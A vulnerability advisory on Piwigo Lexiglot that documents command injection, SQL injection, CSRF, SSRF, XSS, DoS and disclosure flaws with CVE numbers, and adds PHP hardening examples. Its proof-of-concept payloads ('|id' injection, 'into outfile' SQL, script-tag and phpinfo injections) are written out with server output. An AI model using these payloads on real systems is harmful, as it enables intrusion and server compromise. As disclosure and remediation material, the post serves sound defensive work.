Just Another Hacker

Piwigo lexiglot multiple vulnerabilities

This advisory somehow slipped between the cracks, but hey, 4 years late is better than never…right?

About

Lexiglot is a translation platform for PHP projects developed in PHP. – http://piwigo.org/translate

Command injection

CVE-2014-8945

The username and password fields are vulnerable to command injection when adding a new project.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test%7Cid&svn_url=http%3A%2F%2Fhost%3A8888%2Ftest%7Cid&svn_user=test%7Cid&svn_password=test%7Cid&files=1%2C2%2C3&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(53) "uid=33(www-data) gid=33(www-data) groups=33(www-data)"

SQL Injection

CVE-2014-8941

There are several SQL injection vulnerabilities in the project.

~# curl 'http://192.168.58.134/vvv/lexiglot/admin.php?page=users&from_id=-1"+union+select+"abc"+into+outfile+"/tmp/winrar"+--+-'

POST /vvv/lexiglot/admin.php?page=history HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415751084-sV2wWGNLwVjAwGDxwhXcw4oemS8%3D; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=jqnd14cvtvddkf99t8d18ikr17

user_id=-1&language=-1&project=-1&status=-1&limit=1'&search=Search

CSRF

CVE-2014-8942

The identified SQL injection can be exploited through CSRF.

SSRF

CVE-2014-8943

The add-project page requests the URL supplied for an svn repository to check that it is a valid svn repository. An attacker can abuse this to make the server issue requests on the attacker's behalf.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test&svn_url=http%3A%2F%2Fsecadvent.com%3A8888%2F&svn_user=test&svn_password=test&files=test&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(132) "svn: OPTIONS of 'http://secadvent.com:8888': Could not read status line: connection was closed by server (http://secadvent.com:8888)"
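
One way to constrain the svn_url field before svn ever contacts it, as an added example that is not Lexiglot's code. The function name, the port allowlist and the sample URLs are assumptions made for illustration.

```php
<?php
// Added example, not Lexiglot code. check_repo_url() and REPO_PORTS are
// hypothetical names; the URLs in the demo are constructed.
const REPO_PORTS = [80, 443];

function check_repo_url(string $url): string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('scheme not allowed');
    }
    if (isset($p['user']) || isset($p['pass'])) {
        throw new InvalidArgumentException('credentials in URL not allowed');
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, REPO_PORTS, true)) {
        throw new InvalidArgumentException('port not allowed');
    }
    // Fail closed: the host must resolve, and every address it resolves to
    // must lie outside the private and reserved ranges.
    $ips = gethostbynamel($p['host']);
    if (!$ips) {
        throw new InvalidArgumentException('host does not resolve to IPv4');
    }
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            throw new InvalidArgumentException("internal address $ip not allowed");
        }
    }
    return $url;
}

// Constructed inputs; IP literals are used so the demo needs no DNS.
foreach (['http://127.0.0.1/', 'http://192.168.58.134/', 'http://169.254.169.254/',
          'http://127.0.0.1:8888/', 'file:///etc/passwd'] as $u) {
    try {
        check_repo_url($u);
        echo "accepted: $u\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: $u ({$e->getMessage()})\n";
    }
}
```

svn resolves the host name again when it connects, so this check narrows the exposure but does not remove it. An operator-maintained allowlist of repository hosts is the stronger control.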

Cross site scripting

CVE-2014-8944

There are both persistent and reflected XSS issues in this project:

Reflected: Login with username a"><script>alert(1)</script>

Persistent: Through the configuration interface, via the install_name, intro_message and new_file_content parameters:

POST /vvv/lexiglot/admin.php?page=config HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 435
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php?page=config
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415755982-4D8DIXhWWhJEXJnq8Z%2BmNBJ%2BhSQ%3D; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=v97mnbctl9hlkc0564cgu7r034
X-FirePHP: 0.4.4
X-FirePHP-Version: 0.4.4
X-Wf-Max-Combined-Size: 262144

install_name=Lexiglot<script+src=xss>&intro_message=Welcome+on+your+new+installation+of+Lexiglot%21<script+src+xss2>&default_language=en_UK&var_name=lang&use_stats=1&use_talks=1&access_to_guest=1&allow_registration=1&allow_profile=1&user_can_add_language=1&user_default_language=own&user_default_project=all&language_default_user=all&project_default_user=all&new_file_content=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%2F%2FWAT&save_config=Save

DoS

CVE-2014-8937

The api/update.php URL is publicly accessible and runs svn update on all registered projects, which consumes significant resources and ties up a web server thread. Multiple simultaneous requests to this URL will cause resource exhaustion and render the web server inaccessible.
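
A sketch of how an update endpoint can be gated so that it is neither anonymous nor able to run concurrently, as an added example that is not Lexiglot's code. The shared token, the lock file path and run_guarded_update() are assumptions.

```php
<?php
// Added example, not Lexiglot code. run_guarded_update(), the token value
// and the lock path are hypothetical.

function run_guarded_update(string $supplied, string $expected,
                            string $lockPath, callable $update): int
{
    // 1. Only callers that know the shared secret (for example the cron job)
    //    may trigger an update. hash_equals() compares in constant time.
    if ($expected === '' || !hash_equals($expected, $supplied)) {
        return 403;
    }
    // 2. One update at a time: a non-blocking exclusive lock makes any
    //    concurrent request return at once instead of tying up a worker.
    $fh = fopen($lockPath, 'c');
    if ($fh === false) {
        return 500;
    }
    if (!flock($fh, LOCK_EX | LOCK_NB)) {
        fclose($fh);
        return 503;
    }
    try {
        $update();
        return 200;
    } finally {
        flock($fh, LOCK_UN);
        fclose($fh);
    }
}

// Constructed demo: the callback stands in for "svn update on every project"
// and, while it holds the lock, simulates a second request arriving.
$lock = sys_get_temp_dir() . '/lexiglot-update.lock';
$update = function () use ($lock) {
    $status = run_guarded_update('s3cret', 's3cret', $lock, function () {});
    echo "concurrent request: $status\n";
};
echo 'request without token: ', run_guarded_update('', 's3cret', $lock, $update), "\n";
echo 'request with token: ', run_guarded_update('s3cret', 's3cret', $lock, $update), "\n";
```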

Local credential disclosure

CVE-2014-8938

The svn update function runs svn with the username and password as command-line arguments. In shared environments other users may be able to obtain these credentials by running the ps command:

~# ps auxw | grep svn
www-data 27662  0.0  0.4  12792  3548 ?        S    20:17   0:00 svn checkout  http://host:8888/ ./local/test --revision HEAD --username test --password test
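
Both this disclosure and the command injection (CVE-2014-8945) stem from how the svn command line is assembled. The following added example, which is not Lexiglot's code, starts svn without a shell and passes the password on stdin. The function names are hypothetical, and it assumes PHP 7.4 or later (array form of proc_open) and Subversion 1.10 or later (--password-from-stdin).

```php
<?php
// Added example, not Lexiglot code. build_svn_argv() and svn_checkout() are
// hypothetical names; the demo values are taken from the requests on this page.

// Validate the form fields and return an argv array. Nothing is concatenated
// into a shell command line, and no value can start with "-".
function build_svn_argv(string $name, string $url, string $user): array
{
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
        throw new InvalidArgumentException('invalid project name');
    }
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9._@-]{0,63}$/', $user)) {
        throw new InvalidArgumentException('invalid svn username');
    }
    if (!preg_match('#^https?://[A-Za-z0-9.-]+(:\d{1,5})?(/[A-Za-z0-9._~/%+-]*)?$#', $url)) {
        throw new InvalidArgumentException('invalid repository URL');
    }
    return ['svn', 'checkout', '--non-interactive', '--revision', 'HEAD',
            '--username', $user, '--password-from-stdin',
            $url, './local/' . $name];
}

function svn_checkout(array $argv, string $password): array
{
    if (strpbrk($password, "\r\n\0") !== false) {
        throw new InvalidArgumentException('invalid svn password');
    }
    // stderr is merged into stdout so one read drains both streams.
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['redirect', 1]];
    $proc = proc_open($argv, $spec, $pipes);   // array form: no /bin/sh
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start svn');
    }
    fwrite($pipes[0], $password . "\n");       // never visible in ps output
    fclose($pipes[0]);
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return ['exit' => proc_close($proc), 'output' => $output];
}

// Demo (validation only, svn is not started): the injected values, then clean ones.
foreach ([['test|id', 'http://host:8888/test|id', 'test|id'],
          ['test', 'http://host:8888/', 'test']] as [$n, $u, $usr]) {
    try {
        echo json_encode(build_svn_argv($n, $u, $usr)), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```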

Local path disclosure

CVE-2014-8939

The local path is disclosed by the following URL if PHP is configured to display warnings: include/smarty/plugins/modifier.date_format.php

Information disclosure

CVE-2014-8940

An attacker can access the /update.log URL to view all the projects that have been updated. This can be used to leverage the aforementioned DoS attack or to browse repository code, as the projects are checked out to /local/projectname. Example:

~# GET http://localhost/vvv/lexiglot/update.log | head -1
[2014-11-08T11:58:10+01:00] rotateimage
~# GET http://localhost/vvv/lexiglot/local/rotateimage | head -10
<title>Index of /vvv/lexiglot/local/rotateimage</title>

<img src="/icons/folder.gif" alt="[DIR]"> <a href="ar_SA/">ar_SA/</a>

Solution

Upgrade to the latest version or seek an alternative, as the vendor deemed some of these issues acceptable.
